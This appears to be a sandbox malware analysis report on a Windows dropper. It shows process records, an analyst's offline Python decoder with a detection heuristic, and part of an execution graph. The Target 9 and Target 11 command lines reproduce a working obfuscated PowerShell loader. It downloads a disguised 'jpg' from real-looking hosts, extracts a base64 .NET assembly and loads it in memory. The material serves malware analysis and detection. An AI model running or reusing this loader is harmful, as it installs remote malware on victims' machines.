                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=186,atl-edge-internal;dur=4,atl-edge-upstream;dur=183,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


                                                                                                      Target ID:4
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Users\user\Desktop\GdGXG0bnxH.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\GdGXG0bnxH.exe"
                                                                                                      Imagebase:0x7ff7e6e80000
                                                                                                      File size:163'840 bytes
                                                                                                      MD5 hash:8970EEF61BA5B0D180B01242796BAD53
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /c 675c87f6bfee1.vbs
                                                                                                      Imagebase:0x7ff7d1730000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs"
                                                                                                      Imagebase:0xf40000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:09:36:09
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$G
w$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$E
w$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBJ$Gs$SQBo$GM$ZwBh$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBz$GY$dwBx$GU$cQB3$C8$d$B3$HE$ZQB3$HE$ZQ$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $sodigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:09:36:09
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:09:36:10
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true
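The two PowerShell command lines above (Target 9 and Target 11) are the whole loader. Stage 1 restores a base64 blob by swapping every '$' back to 'A', decodes it as UTF-16LE (the .NET "Unicode" encoding) and hands the cleartext to a second powershell.exe. Stage 2 downloads a "jpg" from one of two hardcoded hosts in random order, carves the text between <<BASE64_START>> and <<BASE64_END>>, base64-decodes it straight into a .NET assembly via [System.Reflection.Assembly]::Load, and invokes testpowershell.Hoaaaaaasdme.lfsgeddddddda with the next download location written backwards. The Python below is an added analyst helper, not part of the Joe Sandbox report or of the malware; it reproduces those decoding steps offline against constructed input (no network access), with a single real value: the reversed argument string copied verbatim from the Target 11 command line. The looks_like_stage1 heuristic, the recover_stage1_from_cmdline extractor and the sample_* builders are this example's own.

```python
import base64
import re
from typing import Optional

# --- Stage 1: '$'-for-'A' substituted, UTF-16LE base64 PowerShell -----------------

def decode_stage1(blob: str) -> str:
    """Undo $sodigo.replace('$','A') and the Unicode (UTF-16LE) base64 encoding,
    returning the cleartext PowerShell that stage 1 passes to the next powershell.exe."""
    return base64.b64decode(blob.replace("$", "A")).decode("utf-16-le")

def obfuscate_stage1(script: str) -> str:
    """Re-create the loader's encoding; used only to build offline test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", "$")

def looks_like_stage1(cmdline: str) -> bool:
    """Triage heuristic (ours, not from the report): a literal '$'->'A' replace feeding
    FromBase64String and Unicode.GetString is the signature of this stage-1 stub."""
    low = cmdline.lower()
    return ("replace('$','a')" in low.replace(" ", "")
            and "frombase64string" in low
            and "unicode.getstring" in low)

def recover_stage1_from_cmdline(cmdline: str) -> Optional[str]:
    """Pull the first long single-quoted base64/'$' blob out of a command line and
    decode it. Returns None if no blob is present."""
    m = re.search(r"'([A-Za-z0-9+/=\$]{16,})'", cmdline)
    return decode_stage1(m.group(1)) if m else None

# --- Stage 2: payload carved out of a downloaded "image" ----------------------------

MARKER_START = "<<BASE64_START>>"
MARKER_END = "<<BASE64_END>>"

def extract_marked_payload(image_bytes: bytes) -> Optional[bytes]:
    """Mirror the stage-2 carving: UTF-8-decode the download, locate both markers,
    base64-decode what lies between them. None when the markers are missing or out
    of order (the loader then silently does nothing, exactly like its if-guard)."""
    text = image_bytes.decode("utf-8", errors="ignore")
    start = text.find(MARKER_START)
    end = text.find(MARKER_END)
    if start < 0 or end <= start:
        return None
    start += len(MARKER_START)
    return base64.b64decode(text[start:end])

def is_pe(data: bytes) -> bool:
    """Assembly.Load expects a PE image; the 'MZ' DOS magic is enough for triage
    (a full check would also parse the CLR header)."""
    return len(data) >= 2 and data[:2] == b"MZ"

def unreverse_argument(arg: str) -> str:
    """Stage 2 hands the final download location to the assembly reversed and padded
    with a space; trim and reverse it back."""
    return arg.strip()[::-1]

# --- Constructed samples (not data from the sandbox run) ----------------------------

def sample_cmdline(script: str = "Write-Host 'stage two'") -> str:
    """A stage-1 command line built in the same shape as Target 9's, with our own payload."""
    return ("powershell.exe \"$sodigo = '" + obfuscate_stage1(script) + "';$oWjuxd = "
            "[system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( "
            "$sodigo.replace('$','A') ));powershell.exe $OWjuxD\"")

def fake_assembly() -> bytes:
    """Constructed PE-looking stub standing in for the real .NET payload."""
    return b"MZ" + b"\x00" * 58 + b"PE\x00\x00"

def sample_image() -> bytes:
    """Constructed 'jpg': JFIF-like junk, then the markers around the base64 stub."""
    return (b"\xff\xd8\xff\xe0JFIF constructed junk "
            + MARKER_START.encode() + base64.b64encode(fake_assembly())
            + MARKER_END.encode() + b" trailing junk")

# Copied verbatim from the Target 11 command line in the report
REVERSED_ARG = " txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib"

if __name__ == "__main__":
    print(recover_stage1_from_cmdline(sample_cmdline()))
    payload = extract_marked_payload(sample_image())
    print("payload is PE:", payload is not None and is_pe(payload))
    print("stage-3 location:", unreverse_argument(REVERSED_ARG))
```

Running decode_stage1 over the first 32 characters of the real $sodigo blob ("WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$") yields "[Net.Service", the start of the Target 11 command line, which confirms the substitution direction; the full blob decodes to that command line. For detection, the stage-1 heuristic fires on the replace/FromBase64String/Unicode.GetString triple rather than on the blob itself, so it survives the attacker re-encoding the payload.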


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:31.4%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:42.3%
                                                                                                        Total number of Nodes:928
                                                                                                        Total number of Limit Nodes:45
                                                                                                        execution_graph (node/edge layout data of the interactive graph; node identifiers and edges omitted, the API calls reached are kept). All node addresses fall inside the sample's own image (Imagebase 0x7ff7e6e80000 of GdGXG0bnxH.exe, Target 4).
                                                                                                        Startup, CRT and exception handling: SetUnhandledExceptionFilter, UnhandledExceptionFilter, ?terminate@, GetModuleHandleW, __set_app_type, __setusermatherr, _initterm, _IsNonwritableInCurrentImage, _ismbblead, _amsg_exit, _cexit, exit, GetStartupInfoW, GetVersion, GetVersionExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetCurrentProcess, TerminateProcess, ExitProcess, Sleep, GetLastError, memset, memcpy_s, _vsnprintf
                                                                                                        Dialog and message loop: DialogBoxIndirectParamA, GetDesktopWindow, SetWindowPos, SetWindowTextA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MsgWaitForMultipleObjects, PeekMessageA, DispatchMessageA, EndDialog, MessageBoxA, MessageBeep, LoadStringA
                                                                                                        Threads and synchronisation: CreateThread, TerminateThread, CreateEventA, SetEvent, ResetEvent, CreateMutexA, CloseHandle
                                                                                                        Embedded resources: FindResourceA, FindResourceExA, SizeofResource, LoadResource, LockResource, FreeResource, GetModuleFileNameA, #17 (ordinal import)
                                                                                                        Dynamic API resolution: LoadLibraryA, GetProcAddress (resolving DecryptFileA), FreeLibrary
                                                                                                        File system and directories: GetSystemDirectoryA, GetWindowsDirectoryA, GetCurrentDirectoryA, SetCurrentDirectoryA, WriteFile, SetFileAttributesA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, RemoveDirectoryA
                                                                                                        Registry: RegOpenKeyExA, RegQueryInfoKeyA, RegQueryValueExA, RegDeleteValueA, RegCloseKey
                                                                                                        Token, privilege and reboot path: OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, EqualSid, FreeSid, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx
                                                                                                        Version info and memory: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree, LocalAlloc, LocalFree
                                                                                                        String helpers: CharNextA, CharPrevA, CharUpperA, IsDBCSLeadByte, CompareStringA, lstrcmpA
2395 7ff7e6e87f6d 2394->2395 2394->2396 2395->2396 2399 7ff7e6e87f90 GetSystemMetrics 2395->2399 2397 7ff7e6e88470 7 API calls 2396->2397 2398 7ff7e6e83eca 2397->2398 2398->2333 2404 7ff7e6e87e34 2398->2404 2399->2396 2400 7ff7e6e87fa7 RegOpenKeyExA 2399->2400 2400->2396 2401 7ff7e6e87fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2396 2403 7ff7e6e88026 2401->2403 2402 7ff7e6e88065 CharNextA 2402->2403 2403->2396 2403->2402 2405 7ff7e6e87e5a EnumResourceLanguagesA 2404->2405 2407 7ff7e6e87edd 2404->2407 2406 7ff7e6e87e9f EnumResourceLanguagesA 2405->2406 2405->2407 2406->2407 2407->2333 2409 7ff7e6e8265b CharUpperA CharNextA CharNextA 2408->2409 2410 7ff7e6e827e0 GetSystemDirectoryA 2408->2410 2411 7ff7e6e827dd 2409->2411 2412 7ff7e6e8269c 2409->2412 2413 7ff7e6e827f1 2410->2413 2411->2410 2414 7ff7e6e827c7 GetWindowsDirectoryA 2412->2414 2415 7ff7e6e826a6 2412->2415 2416 7ff7e6e82805 2413->2416 2417 7ff7e6e87ba8 CharPrevA 2413->2417 2414->2413 2420 7ff7e6e87ba8 CharPrevA 2415->2420 2418 7ff7e6e88470 7 API calls 2416->2418 2417->2416 2419 7ff7e6e82814 2418->2419 2419->2391 2421 7ff7e6e82705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff7e6e82738 RegQueryValueExA 2421->2422 2423 7ff7e6e8276b 2422->2423 2424 7ff7e6e827b4 RegCloseKey 2422->2424 2425 7ff7e6e82774 ExpandEnvironmentStringsA 2423->2425 2426 7ff7e6e82792 2423->2426 2424->2413 2425->2426 2426->2424 2428 7ff7e6e812bb 2427->2428 2429 7ff7e6e81221 GetProcAddress 2427->2429 2432 7ff7e6e88470 7 API calls 2428->2432 2430 7ff7e6e812ac FreeLibrary 2429->2430 2431 7ff7e6e8123f AllocateAndInitializeSid 2429->2431 2430->2428 2431->2430 2434 7ff7e6e81288 FreeSid 2431->2434 2433 7ff7e6e812ca 2432->2433 2433->2343 2433->2344 2434->2430 2437 7ff7e6e85050 7 API calls 2436->2437 2438 7ff7e6e860bf LocalAlloc 2437->2438 2439 7ff7e6e860dd 2438->2439 2440 7ff7e6e8610b 2438->2440 2442 7ff7e6e84dcc 24 API calls 2439->2442 2441 7ff7e6e85050 7 API calls 2440->2441 2443 7ff7e6e8611d 2441->2443 2444 7ff7e6e860fb 2442->2444 2445 
7ff7e6e8615a lstrcmpA 2443->2445 2446 7ff7e6e86121 2443->2446 2657 7ff7e6e87700 GetLastError 2444->2657 2449 7ff7e6e8618a 2445->2449 2450 7ff7e6e86174 LocalFree 2445->2450 2448 7ff7e6e84dcc 24 API calls 2446->2448 2452 7ff7e6e8613f LocalFree 2448->2452 2453 7ff7e6e84dcc 24 API calls 2449->2453 2451 7ff7e6e83123 2450->2451 2451->2161 2451->2163 2451->2168 2452->2451 2454 7ff7e6e861ac LocalFree 2453->2454 2455 7ff7e6e86100 2454->2455 2455->2451 2457 7ff7e6e85050 7 API calls 2456->2457 2458 7ff7e6e86001 2457->2458 2459 7ff7e6e86006 2458->2459 2460 7ff7e6e8604a 2458->2460 2462 7ff7e6e84dcc 24 API calls 2459->2462 2461 7ff7e6e85050 7 API calls 2460->2461 2463 7ff7e6e86063 2461->2463 2464 7ff7e6e86025 2462->2464 2465 7ff7e6e8772c 13 API calls 2463->2465 2466 7ff7e6e83146 2464->2466 2467 7ff7e6e8606f 2465->2467 2466->2168 2470 7ff7e6e866c4 2466->2470 2467->2466 2468 7ff7e6e86073 2467->2468 2469 7ff7e6e84dcc 24 API calls 2468->2469 2469->2464 2471 7ff7e6e85050 7 API calls 2470->2471 2472 7ff7e6e86706 LocalAlloc 2471->2472 2473 7ff7e6e86756 2472->2473 2474 7ff7e6e86726 2472->2474 2476 7ff7e6e85050 7 API calls 2473->2476 2475 7ff7e6e84dcc 24 API calls 2474->2475 2477 7ff7e6e86744 2475->2477 2478 7ff7e6e86768 2476->2478 2682 7ff7e6e87700 GetLastError 2477->2682 2480 7ff7e6e8676c 2478->2480 2481 7ff7e6e867a5 lstrcmpA LocalFree 2478->2481 2485 7ff7e6e84dcc 24 API calls 2480->2485 2482 7ff7e6e867ec 2481->2482 2483 7ff7e6e86837 2481->2483 2491 7ff7e6e864e4 53 API calls 2482->2491 2487 7ff7e6e86b14 2483->2487 2490 7ff7e6e8684f GetTempPathA 2483->2490 2484 7ff7e6e86749 2486 7ff7e6e8674f 2484->2486 2488 7ff7e6e8678a LocalFree 2485->2488 2492 7ff7e6e88470 7 API calls 2486->2492 2489 7ff7e6e87ac8 28 API calls 2487->2489 2488->2486 2489->2486 2493 7ff7e6e86872 2490->2493 2500 7ff7e6e868a5 2490->2500 2494 7ff7e6e8680c 2491->2494 2495 7ff7e6e83153 2492->2495 2658 7ff7e6e864e4 2493->2658 2494->2486 2497 7ff7e6e86814 2494->2497 2495->2168 2495->2173 2499 7ff7e6e84dcc 24 API calls 
